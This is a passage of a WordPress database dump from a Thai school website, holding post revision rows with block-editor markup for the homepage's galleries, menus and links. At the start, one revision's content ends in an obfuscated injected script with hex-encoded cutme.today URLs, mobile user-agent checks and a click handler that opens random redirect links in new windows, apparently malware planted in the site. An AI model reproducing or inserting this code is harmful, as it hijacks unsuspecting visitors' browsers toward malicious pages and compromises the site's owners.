)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 11:42:19','2024-08-20 04:42:19','',871,'http://pakhaeng.ssk.in.th/?p=903',0,'revision','',0),
(904,1,'2024-08-20 11:43:25','2024-08-20 04:43:25','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 